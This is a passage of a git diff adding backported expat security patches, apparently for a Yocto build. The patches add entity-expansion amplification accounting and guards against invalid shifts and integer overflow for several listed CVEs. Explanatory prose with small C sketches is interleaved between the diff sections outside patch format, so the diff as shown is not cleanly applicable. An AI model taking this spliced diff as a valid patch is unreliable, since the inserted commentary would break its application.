++ if (! accountingDiffTolerated(parser, tok, ptr, next, __LINE__, account)) {
++ accountingOnAbort(parser);
++ return XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ }
++#endif
+ switch (tok) {
+ case XML_TOK_NONE:
+ return XML_ERROR_NONE;
+@@ -5353,6 +5610,14 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+ XML_Char ch = (XML_Char)XmlPredefinedEntityName(
+ enc, ptr + enc->minBytesPerChar, next - enc->minBytesPerChar);
+ if (ch) {
++#ifdef XML_DTD
++ /* NOTE: We are replacing 4-6 characters original input for 1 character
++ * so there is no amplification and hence recording without
++ * protection. */
++ accountingDiffTolerated(parser, tok, (char *)&ch,
++ ((char *)&ch) + sizeof(XML_Char), __LINE__,
++ XML_ACCOUNT_ENTITY_EXPANSION);
++#endif /* XML_DTD */
+ if (! poolAppendChar(pool, ch))
+ return XML_ERROR_NO_MEMORY;
+ break;
+@@ -5430,9 +5695,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+ enum XML_Error result;
+ const XML_Char *textEnd = entity->textPtr + entity->textLen;
+ entity->open = XML_TRUE;
++#ifdef XML_DTD
++ entityTrackingOnOpen(parser, entity, __LINE__);
++#endif
+ result = appendAttributeValue(parser, parser->m_internalEncoding,
+- isCdata, (char *)entity->textPtr,
+- (char *)textEnd, pool);
++ isCdata, (const char *)entity->textPtr,
++ (const char *)textEnd, pool,
++ XML_ACCOUNT_ENTITY_EXPANSION);
++#ifdef XML_DTD
++ entityTrackingOnClose(parser, entity, __LINE__);
++#endif
+ entity->open = XML_FALSE;
+ if (result)
+ return result;
+@@ -5462,13 +5734,16 @@ appendAttributeValue(XML_Parser parser, const ENCODING *enc, XML_Bool isCdata,
+
+ static enum XML_Error
+ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+- const char *entityTextPtr, const char *entityTextEnd) {
++ const char *entityTextPtr, const char *entityTextEnd,
++ enum XML_Account account) {
+ DTD *const dtd = parser->m_dtd; /* save one level of indirection */
+ STRING_POOL *pool = &(dtd->entityValuePool);
+ enum XML_Error result = XML_ERROR_NONE;
+ #ifdef XML_DTD
+ int oldInEntityValue = parser->m_prologState.inEntityValue;
+ parser->m_prologState.inEntityValue = 1;
++#else
++ UNUSED_P(account);
+ #endif /* XML_DTD */
+ /* never return Null for the value argument in EntityDeclHandler,
+ since this would indicate an external entity; therefore we
+@@ -5481,6 +5756,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+ for (;;) {
+ const char *next;
+ int tok = XmlEntityValueTok(enc, entityTextPtr, entityTextEnd, &next);
++
++#ifdef XML_DTD
++ if (! accountingDiffTolerated(parser, tok, entityTextPtr, next, __LINE__,
++ account)) {
++ accountingOnAbort(parser);
++ result = XML_ERROR_AMPLIFICATION_LIMIT_BREACH;
++ goto endEntityValue;
++ }
++#endif
++
+ switch (tok) {
+ case XML_TOK_PARAM_ENTITY_REF:
+ #ifdef XML_DTD
+@@ -5516,13 +5801,16 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+ if (parser->m_externalEntityRefHandler) {
+ dtd->paramEntityRead = XML_FALSE;
+ entity->open = XML_TRUE;
++ entityTrackingOnOpen(parser, entity, __LINE__);
+ if (! parser->m_externalEntityRefHandler(
+ parser->m_externalEntityRefHandlerArg, 0, entity->base,
+ entity->systemId, entity->publicId)) {
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ result = XML_ERROR_EXTERNAL_ENTITY_HANDLING;
+ goto endEntityValue;
+ }
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ if (! dtd->paramEntityRead)
+ dtd->keepProcessing = dtd->standalone;
+@@ -5530,9 +5818,12 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+ dtd->keepProcessing = dtd->standalone;
+ } else {
+ entity->open = XML_TRUE;
++ entityTrackingOnOpen(parser, entity, __LINE__);
+ result = storeEntityValue(
+- parser, parser->m_internalEncoding, (char *)entity->textPtr,
+- (char *)(entity->textPtr + entity->textLen));
++ parser, parser->m_internalEncoding, (const char *)entity->textPtr,
++ (const char *)(entity->textPtr + entity->textLen),
++ XML_ACCOUNT_ENTITY_EXPANSION);
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ if (result)
+ goto endEntityValue;
+@@ -6893,3 +7184,741 @@ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+ memcpy(result, s, charsRequired * sizeof(XML_Char));
+ return result;
+ }
++
++#ifdef XML_DTD
++
++static float
++accountingGetCurrentAmplification(XML_Parser rootParser) {
++ const XmlBigCount countBytesOutput
++ = rootParser->m_accounting.countBytesDirect
++ + rootParser->m_accounting.countBytesIndirect;
++ const float amplificationFactor
++ = rootParser->m_accounting.countBytesDirect
++ ? (countBytesOutput
++ / (float)(rootParser->m_accounting.countBytesDirect))
++ : 1.0f;
++ assert(! rootParser->m_parentParser);
++ return amplificationFactor;
++}
++
++static void
++accountingReportStats(XML_Parser originParser, const char *epilog) {
++ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++ assert(! rootParser->m_parentParser);
++
++ if (rootParser->m_accounting.debugLevel < 1) {
++ return;
++ }
++
++ const float amplificationFactor
++ = accountingGetCurrentAmplification(rootParser);
++ fprintf(stderr,
++ "expat: Accounting(%p): Direct " EXPAT_FMT_ULL(
++ "10") ", indirect " EXPAT_FMT_ULL("10") ", amplification %8.2f%s",
++ (void *)rootParser, rootParser->m_accounting.countBytesDirect,
++ rootParser->m_accounting.countBytesIndirect,
++ (double)amplificationFactor, epilog);
++}
++
++static void
++accountingOnAbort(XML_Parser originParser) {
++ accountingReportStats(originParser, " ABORTING\n");
++}
++
++static void
++accountingReportDiff(XML_Parser rootParser,
++ unsigned int levelsAwayFromRootParser, const char *before,
++ const char *after, ptrdiff_t bytesMore, int source_line,
++ enum XML_Account account) {
++ assert(! rootParser->m_parentParser);
++
++ fprintf(stderr,
++ " (+" EXPAT_FMT_PTRDIFF_T("6") " bytes %s|%d, xmlparse.c:%d) %*s\"",
++ bytesMore, (account == XML_ACCOUNT_DIRECT) ? "DIR" : "EXP",
++ levelsAwayFromRootParser, source_line, 10, "");
++
++ const char ellipis[] = "[..]";
++ const size_t ellipsisLength = sizeof(ellipis) /* because compile-time */ - 1;
++ const unsigned int contextLength = 10;
++
++ /* Note: Performance is of no concern here */
++ const char *walker = before;
++ if ((rootParser->m_accounting.debugLevel >= 3)
++ || (after - before)
++ <= (ptrdiff_t)(contextLength + ellipsisLength + contextLength)) {
++ for (; walker < after; walker++) {
++ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++ }
++ } else {
++ for (; walker < before + contextLength; walker++) {
++ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++ }
++ fprintf(stderr, ellipis);
++ walker = after - contextLength;
++ for (; walker < after; walker++) {
++ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++ }
++ }
++ fprintf(stderr, "\"\n");
++}
++
++static XML_Bool
++accountingDiffTolerated(XML_Parser originParser, int tok, const char *before,
++ const char *after, int source_line,
++ enum XML_Account account) {
++ /* Note: We need to check the token type *first* to be sure that
++ * we can even access variable <after>, safely.
++ * E.g. for XML_TOK_NONE <after> may hold an invalid pointer. */
++ switch (tok) {
++ case XML_TOK_INVALID:
++ case XML_TOK_PARTIAL:
++ case XML_TOK_PARTIAL_CHAR:
++ case XML_TOK_NONE:
++ return XML_TRUE;
++ }
++
++ if (account == XML_ACCOUNT_NONE)
++ return XML_TRUE; /* because these bytes have been accounted for, already */
++
++ unsigned int levelsAwayFromRootParser;
++ const XML_Parser rootParser
++ = getRootParserOf(originParser, &levelsAwayFromRootParser);
++ assert(! rootParser->m_parentParser);
++
++ const int isDirect
++ = (account == XML_ACCOUNT_DIRECT) && (originParser == rootParser);
++ const ptrdiff_t bytesMore = after - before;
++
++ XmlBigCount *const additionTarget
++ = isDirect ? &rootParser->m_accounting.countBytesDirect
++ : &rootParser->m_accounting.countBytesIndirect;
++
++ /* Detect and avoid integer overflow */
++ if (*additionTarget > (XmlBigCount)(-1) - (XmlBigCount)bytesMore)
++ return XML_FALSE;
++ *additionTarget += bytesMore;
++
++ const XmlBigCount countBytesOutput
++ = rootParser->m_accounting.countBytesDirect
++ + rootParser->m_accounting.countBytesIndirect;
++ const float amplificationFactor
++ = accountingGetCurrentAmplification(rootParser);
++ const XML_Bool tolerated
++ = (countBytesOutput < rootParser->m_accounting.activationThresholdBytes)
++ || (amplificationFactor
++ <= rootParser->m_accounting.maximumAmplificationFactor);
++
++ if (rootParser->m_accounting.debugLevel >= 2) {
++ accountingReportStats(rootParser, "");
++ accountingReportDiff(rootParser, levelsAwayFromRootParser, before, after,
++ bytesMore, source_line, account);
++ }
++
++ return tolerated;
++}
++
++static void
++entityTrackingReportStats(XML_Parser rootParser, ENTITY *entity,
++ const char *action, int sourceLine) {
++ assert(! rootParser->m_parentParser);
++ if (rootParser->m_entity_stats.debugLevel < 1)
++ return;
++
++# if defined(XML_UNICODE)
++ const char *const entityName = "[..]";
++# else
++ const char *const entityName = entity->name;
++# endif
++
++ fprintf(
++ stderr,
++ "expat: Entities(%p): Count %9d, depth %2d/%2d %*s%s%s; %s length %d (xmlparse.c:%d)\n",
++ (void *)rootParser, rootParser->m_entity_stats.countEverOpened,
++ rootParser->m_entity_stats.currentDepth,
++ rootParser->m_entity_stats.maximumDepthSeen,
++ (rootParser->m_entity_stats.currentDepth - 1) * 2, "",
++ entity->is_param ? "%" : "&", entityName, action, entity->textLen,
++ sourceLine);
++}
++
++static void
++entityTrackingOnOpen(XML_Parser originParser, ENTITY *entity, int sourceLine) {
++ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++ assert(! rootParser->m_parentParser);
++
++ rootParser->m_entity_stats.countEverOpened++;
++ rootParser->m_entity_stats.currentDepth++;
++ if (rootParser->m_entity_stats.currentDepth
++ > rootParser->m_entity_stats.maximumDepthSeen) {
++ rootParser->m_entity_stats.maximumDepthSeen++;
++ }
++
++ entityTrackingReportStats(rootParser, entity, "OPEN ", sourceLine);
++}
++
++static void
++entityTrackingOnClose(XML_Parser originParser, ENTITY *entity, int sourceLine) {
++ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++ assert(! rootParser->m_parentParser);
++
++ entityTrackingReportStats(rootParser, entity, "CLOSE", sourceLine);
++ rootParser->m_entity_stats.currentDepth--;
++}
++
++static XML_Parser
++getRootParserOf(XML_Parser parser, unsigned int *outLevelDiff) {
++ XML_Parser rootParser = parser;
++ unsigned int stepsTakenUpwards = 0;
++ while (rootParser->m_parentParser) {
++ rootParser = rootParser->m_parentParser;
++ stepsTakenUpwards++;
++ }
++ assert(! rootParser->m_parentParser);
++ if (outLevelDiff != NULL) {
++ *outLevelDiff = stepsTakenUpwards;
++ }
++ return rootParser;
++}
++
++static const char *
++unsignedCharToPrintable(unsigned char c) {
++ switch (c) {
++ case 0:
++ return "\\0";
++ case 1:
++ return "\\x1";
++ case 2:
++ return "\\x2";
++ case 3:
++ return "\\x3";
++ case 4:
++ return "\\x4";
++ case 5:
++ return "\\x5";
++ case 6:
++ return "\\x6";
++ case 7:
++ return "\\x7";
++ case 8:
++ return "\\x8";
++ case 9:
++ return "\\t";
++ case 10:
++ return "\\n";
++ case 11:
++ return "\\xB";
++ case 12:
++ return "\\xC";
++ case 13:
++ return "\\r";
++ case 14:
++ return "\\xE";
++ case 15:
++ return "\\xF";
++ case 16:
++ return "\\x10";
++ case 17:
++ return "\\x11";
++ case 18:
++ return "\\x12";
++ case 19:
++ return "\\x13";
++ case 20:
++ return "\\x14";
++ case 21:
++ return "\\x15";
++ case 22:
++ return "\\x16";
++ case 23:
++ return "\\x17";
++ case 24:
++ return "\\x18";
++ case 25:
++ return "\\x19";
++ case 26:
++ return "\\x1A";
++ case 27:
++ return "\\x1B";
++ case 28:
++ return "\\x1C";
++ case 29:
++ return "\\x1D";
++ case 30:
++ return "\\x1E";
++ case 31:
++ return "\\x1F";
++ case 32:
++ return " ";
++ case 33:
++ return "!";
++ case 34:
++ return "\\\"";
++ case 35:
++ return "#";
++ case 36:
++ return "$";
++ case 37:
++ return "%";
++ case 38:
++ return "&";
++ case 39:
++ return "'";
++ case 40:
++ return "(";
++ case 41:
++ return ")";
++ case 42:
++ return "*";
++ case 43:
++ return "+";
++ case 44:
++ return ",";
++ case 45:
++ return "-";
++ case 46:
++ return ".";
++ case 47:
++ return "/";
++ case 48:
++ return "0";
++ case 49:
++ return "1";
++ case 50:
++ return "2";
++ case 51:
++ return "3";
++ case 52:
++ return "4";
++ case 53:
++ return "5";
++ case 54:
++ return "6";
++ case 55:
++ return "7";
++ case 56:
++ return "8";
++ case 57:
++ return "9";
++ case 58:
++ return ":";
++ case 59:
++ return ";";
++ case 60:
++ return "<";
++ case 61:
++ return "=";
++ case 62:
++ return ">";
++ case 63:
++ return "?";
++ case 64:
++ return "@";
++ case 65:
++ return "A";
++ case 66:
++ return "B";
++ case 67:
++ return "C";
++ case 68:
++ return "D";
++ case 69:
++ return "E";
++ case 70:
++ return "F";
++ case 71:
++ return "G";
++ case 72:
++ return "H";
++ case 73:
++ return "I";
++ case 74:
++ return "J";
++ case 75:
++ return "K";
++ case 76:
++ return "L";
++ case 77:
++ return "M";
++ case 78:
++ return "N";
++ case 79:
++ return "O";
++ case 80:
++ return "P";
++ case 81:
++ return "Q";
++ case 82:
++ return "R";
++ case 83:
++ return "S";
++ case 84:
++ return "T";
++ case 85:
++ return "U";
++ case 86:
++ return "V";
++ case 87:
++ return "W";
++ case 88:
++ return "X";
++ case 89:
++ return "Y";
++ case 90:
++ return "Z";
++ case 91:
++ return "[";
++ case 92:
++ return "\\\\";
++ case 93:
++ return "]";
++ case 94:
++ return "^";
++ case 95:
++ return "_";
++ case 96:
++ return "`";
++ case 97:
++ return "a";
++ case 98:
++ return "b";
++ case 99:
++ return "c";
++ case 100:
++ return "d";
++ case 101:
++ return "e";
++ case 102:
++ return "f";
++ case 103:
++ return "g";
++ case 104:
++ return "h";
++ case 105:
++ return "i";
++ case 106:
++ return "j";
++ case 107:
++ return "k";
++ case 108:
++ return "l";
++ case 109:
++ return "m";
++ case 110:
++ return "n";
++ case 111:
++ return "o";
++ case 112:
++ return "p";
++ case 113:
++ return "q";
++ case 114:
++ return "r";
++ case 115:
++ return "s";
++ case 116:
++ return "t";
++ case 117:
++ return "u";
++ case 118:
++ return "v";
++ case 119:
++ return "w";
++ case 120:
++ return "x";
++ case 121:
++ return "y";
++ case 122:
++ return "z";
++ case 123:
++ return "{";
++ case 124:
++ return "|";
++ case 125:
++ return "}";
++ case 126:
++ return "~";
++ case 127:
++ return "\\x7F";
++ case 128:
++ return "\\x80";
++ case 129:
++ return "\\x81";
++ case 130:
++ return "\\x82";
++ case 131:
++ return "\\x83";
++ case 132:
++ return "\\x84";
++ case 133:
++ return "\\x85";
++ case 134:
++ return "\\x86";
++ case 135:
++ return "\\x87";
++ case 136:
++ return "\\x88";
++ case 137:
++ return "\\x89";
++ case 138:
++ return "\\x8A";
++ case 139:
++ return "\\x8B";
++ case 140:
++ return "\\x8C";
++ case 141:
++ return "\\x8D";
++ case 142:
++ return "\\x8E";
++ case 143:
++ return "\\x8F";
++ case 144:
++ return "\\x90";
++ case 145:
++ return "\\x91";
++ case 146:
++ return "\\x92";
++ case 147:
++ return "\\x93";
++ case 148:
++ return "\\x94";
++ case 149:
++ return "\\x95";
++ case 150:
++ return "\\x96";
++ case 151:
++ return "\\x97";
++ case 152:
++ return "\\x98";
++ case 153:
++ return "\\x99";
++ case 154:
++ return "\\x9A";
++ case 155:
++ return "\\x9B";
++ case 156:
++ return "\\x9C";
++ case 157:
++ return "\\x9D";
++ case 158:
++ return "\\x9E";
++ case 159:
++ return "\\x9F";
++ case 160:
++ return "\\xA0";
++ case 161:
++ return "\\xA1";
++ case 162:
++ return "\\xA2";
++ case 163:
++ return "\\xA3";
++ case 164:
++ return "\\xA4";
++ case 165:
++ return "\\xA5";
++ case 166:
++ return "\\xA6";
++ case 167:
++ return "\\xA7";
++ case 168:
++ return "\\xA8";
++ case 169:
++ return "\\xA9";
++ case 170:
++ return "\\xAA";
++ case 171:
++ return "\\xAB";
++ case 172:
++ return "\\xAC";
++ case 173:
++ return "\\xAD";
++ case 174:
++ return "\\xAE";
++ case 175:
++ return "\\xAF";
++ case 176:
++ return "\\xB0";
++ case 177:
++ return "\\xB1";
++ case 178:
++ return "\\xB2";
++ case 179:
++ return "\\xB3";
++ case 180:
++ return "\\xB4";
++ case 181:
++ return "\\xB5";
++ case 182:
++ return "\\xB6";
++ case 183:
++ return "\\xB7";
++ case 184:
++ return "\\xB8";
++ case 185:
++ return "\\xB9";
++ case 186:
++ return "\\xBA";
++ case 187:
++ return "\\xBB";
++ case 188:
++ return "\\xBC";
++ case 189:
++ return "\\xBD";
++ case 190:
++ return "\\xBE";
++ case 191:
++ return "\\xBF";
++ case 192:
++ return "\\xC0";
++ case 193:
++ return "\\xC1";
++ case 194:
++ return "\\xC2";
++ case 195:
++ return "\\xC3";
++ case 196:
++ return "\\xC4";
++ case 197:
++ return "\\xC5";
++ case 198:
++ return "\\xC6";
++ case 199:
++ return "\\xC7";
++ case 200:
++ return "\\xC8";
++ case 201:
++ return "\\xC9";
++ case 202:
++ return "\\xCA";
++ case 203:
++ return "\\xCB";
++ case 204:
++ return "\\xCC";
++ case 205:
++ return "\\xCD";
++ case 206:
++ return "\\xCE";
++ case 207:
++ return "\\xCF";
++ case 208:
++ return "\\xD0";
++ case 209:
++ return "\\xD1";
++ case 210:
++ return "\\xD2";
++ case 211:
++ return "\\xD3";
++ case 212:
++ return "\\xD4";
++ case 213:
++ return "\\xD5";
++ case 214:
++ return "\\xD6";
++ case 215:
++ return "\\xD7";
++ case 216:
++ return "\\xD8";
++ case 217:
++ return "\\xD9";
++ case 218:
++ return "\\xDA";
++ case 219:
++ return "\\xDB";
++ case 220:
++ return "\\xDC";
++ case 221:
++ return "\\xDD";
++ case 222:
++ return "\\xDE";
++ case 223:
++ return "\\xDF";
++ case 224:
++ return "\\xE0";
++ case 225:
++ return "\\xE1";
++ case 226:
++ return "\\xE2";
++ case 227:
++ return "\\xE3";
++ case 228:
++ return "\\xE4";
++ case 229:
++ return "\\xE5";
++ case 230:
++ return "\\xE6";
++ case 231:
++ return "\\xE7";
++ case 232:
++ return "\\xE8";
++ case 233:
++ return "\\xE9";
++ case 234:
++ return "\\xEA";
++ case 235:
++ return "\\xEB";
++ case 236:
++ return "\\xEC";
++ case 237:
++ return "\\xED";
++ case 238:
++ return "\\xEE";
++ case 239:
++ return "\\xEF";
++ case 240:
++ return "\\xF0";
++ case 241:
++ return "\\xF1";
++ case 242:
++ return "\\xF2";
++ case 243:
++ return "\\xF3";
++ case 244:
++ return "\\xF4";
++ case 245:
++ return "\\xF5";
++ case 246:
++ return "\\xF6";
++ case 247:
++ return "\\xF7";
++ case 248:
++ return "\\xF8";
++ case 249:
++ return "\\xF9";
++ case 250:
++ return "\\xFA";
++ case 251:
++ return "\\xFB";
++ case 252:
++ return "\\xFC";
++ case 253:
++ return "\\xFD";
++ case 254:
++ return "\\xFE";
++ case 255:
++ return "\\xFF";
++ default:
++ assert(0); /* never gets here */
++ return "dead code";
++ }
++ assert(0); /* never gets here */
++}
++
++#endif /* XML_DTD */
++
++static unsigned long
++getDebugLevel(const char *variableName, unsigned long defaultDebugLevel) {
++ const char *const valueOrNull = getenv(variableName);
++ if (valueOrNull == NULL) {
++ return defaultDebugLevel;
++ }
++ const char *const value = valueOrNull;
++
++ errno = 0;
++ char *afterValue = (char *)value;
++ unsigned long debugLevel = strtoul(value, &afterValue, 10);
++ if ((errno != 0) || (afterValue[0] != '\0')) {
++ errno = 0;
++ return defaultDebugLevel;
++ }
++
++ return debugLevel;
++}
+--
+2.32.0
+
diff --git a/meta/recipes-core/expat/expat/CVE-2021-45960.patch b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
new file mode 100644
index 0000000000..523449e22c
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
@@ -0,0 +1,65 @@
+From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 27 Dec 2021 20:15:02 +0100
+Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function
+ storeAtts (CVE-2021-45960)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/534/commits/0adcb34c49bee5b19bd29b16a578c510c23597ea
+
+CVE: CVE-2021-45960
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++--
+ 1 file changed, 29 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d730f41c3..b47c31b05 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3414,7 +3414,13 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ if (nPrefixes) {
+ int j; /* hash table index */
+ unsigned long version = parser->m_nsAttsVersion;
+- int nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower;
+ unsigned char oldNsAttsPower = parser->m_nsAttsPower;
+ /* size of hash table must be at least 2 * (# of prefixed attributes) */
+ if ((nPrefixes << 1)
+@@ -3425,7 +3431,28 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ ;
+ if (parser->m_nsAttsPower < 3)
+ parser->m_nsAttsPower = 3;
+- nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ nsAttsSize = 1u << parser->m_nsAttsPower;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts,
+ nsAttsSize * sizeof(NS_ATT));
+ if (! temp) {
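The two guards added above protect the expression `1 << parser->m_nsAttsPower` from shifting by the full width of the type, which is undefined behaviour in C and in practice yields a bogus table size that later causes out-of-bounds writes. A minimal standalone sketch of the same pattern, using hypothetical names not taken from the patch:

```
#include <limits.h>

/* Compute a power-of-two hash table size safely.
 * Returns 0 and leaves *out untouched if the shift would be invalid. */
static int safe_pow2_size(unsigned char power, unsigned int *out) {
    /* Shifting by >= the bit width of the left operand is undefined
     * behaviour, so reject such powers up front (same idea as the
     * storeAtts guard above). */
    if (power >= sizeof(unsigned int) * CHAR_BIT)
        return 0;
    *out = 1u << power;
    return 1;
}
```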
diff --git a/meta/recipes-core/expat/expat/CVE-2021-46143.patch b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
new file mode 100644
index 0000000000..b1a726d9a8
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
@@ -0,0 +1,49 @@
+From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 25 Dec 2021 20:52:08 +0100
+Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function
+ doProlog (CVE-2021-46143)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/538/commits/85ae9a2d7d0e9358f356b33977b842df8ebaec2b
+
+CVE: CVE-2021-46143
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ expat/lib/xmlparse.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index b47c31b0..8f243126 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5046,6 +5046,11 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (parser->m_prologState.level >= parser->m_groupSize) {
+ if (parser->m_groupSize) {
+ {
++ /* Detect and prevent integer overflow */
++ if (parser->m_groupSize > (unsigned int)(-1) / 2u) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ char *const new_connector = (char *)REALLOC(
+ parser, parser->m_groupConnector, parser->m_groupSize *= 2);
+ if (new_connector == NULL) {
+@@ -5056,6 +5061,16 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ }
+
+ if (dtd->scaffIndex) {
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ int *const new_scaff_index = (int *)REALLOC(
+ parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int));
+ if (new_scaff_index == NULL)
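The check on m_groupSize above rejects a doubling that would wrap around before REALLOC ever sees it. A hedged sketch of that grow-by-doubling pattern in isolation (grow_buffer and its parameters are hypothetical, not part of expat):

```
#include <limits.h>
#include <stdlib.h>

/* Double *cap and reallocate buf accordingly.
 * Returns NULL (and leaves *cap unchanged) on overflow or OOM. */
static char *grow_buffer(char *buf, unsigned int *cap) {
    /* Doubling past UINT_MAX/2 would wrap to a tiny value, producing a
     * short allocation and later out-of-bounds writes. */
    if (*cap > UINT_MAX / 2u)
        return NULL;
    char *tmp = realloc(buf, (size_t)*cap * 2u);
    if (tmp == NULL)
        return NULL;
    *cap *= 2u;
    return tmp;
}
```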
diff --git a/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
new file mode 100644
index 0000000000..e569fbc7ab
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
@@ -0,0 +1,257 @@
+From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Thu, 30 Dec 2021 22:46:03 +0100
+Subject: [PATCH] lib: Prevent integer overflow at multiple places
+ (CVE-2022-22822 to CVE-2022-22827)
+
+The involved functions are:
+- addBinding (CVE-2022-22822)
+- build_model (CVE-2022-22823)
+- defineAttribute (CVE-2022-22824)
+- lookup (CVE-2022-22825)
+- nextScaffoldPart (CVE-2022-22826)
+- storeAtts (CVE-2022-22827)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/539/commits/9f93e8036e842329863bf20395b8fb8f73834d9e
+
+CVE: CVE-2022-22822 CVE-2022-22823 CVE-2022-22824 CVE-2022-22825 CVE-2022-22826 CVE-2022-22827
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 151 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 8f243126..575e73ee 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3261,13 +3261,38 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+
+ /* get the attributes from the tokenizer */
+ n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts);
++
++ /* Detect and prevent integer overflow */
++ if (n > INT_MAX - nDefaultAtts) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ if (n + nDefaultAtts > parser->m_attsSize) {
+ int oldAttsSize = parser->m_attsSize;
+ ATTRIBUTE *temp;
+ #ifdef XML_ATTR_INFO
+ XML_AttrInfo *temp2;
+ #endif
++
++ /* Detect and prevent integer overflow */
++ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE)
++ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) {
++ parser->m_attsSize = oldAttsSize;
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts,
+ parser->m_attsSize * sizeof(ATTRIBUTE));
+ if (temp == NULL) {
+@@ -3276,6 +3301,17 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ }
+ parser->m_atts = temp;
+ #ifdef XML_ATTR_INFO
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
